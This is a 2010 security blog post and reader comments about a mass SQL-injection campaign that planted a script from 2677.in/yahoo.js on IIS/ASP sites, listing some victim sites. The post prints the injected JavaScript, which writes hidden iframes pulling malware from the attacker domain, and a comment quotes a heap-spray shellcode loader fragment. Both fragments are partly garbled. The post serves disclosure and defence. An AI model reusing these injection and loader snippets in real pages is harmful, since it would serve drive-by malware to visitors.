Mass infection of IIS/ASP sites – 2677.in/yahoo.js

June 11, 2010David Dede

A large number of sites have been hacked again in the last few hours with a malware script pointing to http://2677.in/yahoo.js . Not only small sites, but some big ones got hit as well. It is the same SQL injection attack as used in the robint-us mass infection of a few days ago.

Some of the sites hacked this time:

http://www.ameristar.com/
http://www.servicewomen.org
http://www.chicagopublicradio.org
http://www.industryweek.com
http://www.booksellerandpublisher.com.au
http://www.spain-holiday.com

This time Google says that around 1 thousand pages have been infected. This is the content of the yahoo.js script:

try{__m}catch(e){__m=1;document.title=document.title.replace(/<(w|W)*> /,””);document.write(“< iframe src=http://2677.in/cnzz.html width=0 height==>
<iframe src=http://2677.in/ie.html width=22 height=1

So it loads malware from http://2677.in/ie.html, which then calls http://s11.cnzz.com to load the virus. This is the output of our scan agaisnt ameristar.com:

What is funny is that one of the top pages that got hacked was https://www.idera.com and their seminar about “Understanding SQL Server Security Options”. Just search on Google for “”http://2677.in/yahoo.js” inurl:.idera.com” to see it.

If your site is hacked (or contains malware), and you need help, send us an email at support@sucuri.net or visit our site: Sucuri Security. We can get your sites clean up right away.

Also, consider checking out our site security monitoring. We will monitor your sites 24×7 and alert you if it ever gets infected with malware, hacked or blacklisted.

About David Dede

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Pingback: Tweets that mention Mass infection of IIS/ASP sites – 2677.in/yahoo.js | Sucuri Security -- Topsy.com()
ashcrow

Don't forget it's pulling of ie.html as well which seems to be attempting shellcode and also embeds a hidden anhey.swf.

From the 'sun' div:
"""
….
var a = new Array();
var xcode=loader("log.txt","MM","NN")*262144;
var shellcode=loader("log.txt","XX","YY");
var ls = xcode-(shellcode.length*2 0x01020);
var b = loader("log.txt","VV","WW");
while(b.length<ls)
{
b =b;
}
var lh=b.substring(0,ls/2);
delete b;
lh = lh shellcode;
….
"""
ashcrow

anhey.swf is caught by 2 antivirus packages as a generic trojan: https://www.virustotal.com/analisis/725f0cc85e341… …
@dont

Had the registrar suspend the domain name ~ 5 hrs ago.
spenser

This is exactly why sites that force javascript on visitors is exactly the wrong thing to do.

When online banking users are forced to adopt loose security settings to do the simplest of tasks, then eventually they become the default, and that’s when things go wrong.

Security conscious sites should *not* let their developers run amok demanding ever greater browser permissions. Instead, they should be looking at opportunities to work with less browser permissions.
jj

Since the Idera pages are httpS, they will pass right through any firewalls, proxy servers and unified threat management gateways that do not perform man-in-the-middle SSL interception. That leaves just the desktop AV to defend corporate networks and we all know how weak of a defense they are.
@contentonist

found a new website that appears to host the same script;

4589DOTin/yahoo.js
Test

What is the 3rd party app installed that is vulnerable to SQL injection? That is, what vulnerability in the sites is allowing malicious users to inject the malware to begin with?
Pingback: A.S. Roma website infected with same malware as Jerusalem Post | Data Protection and Recovery Center()
Pingback: A.S. Roma website infected with same malware as Jerusalem Post | Hack In The Box()
Pingback: A.S. Roma website infected with same malware as Jerusalem Post | WeDuggIt()
Pingback: Attack against IIS/ASP sites – google-stat50.info | Sucuri()
Pingback: A.S. Roma website infected with same malware as Jerusalem Post | Naked Security()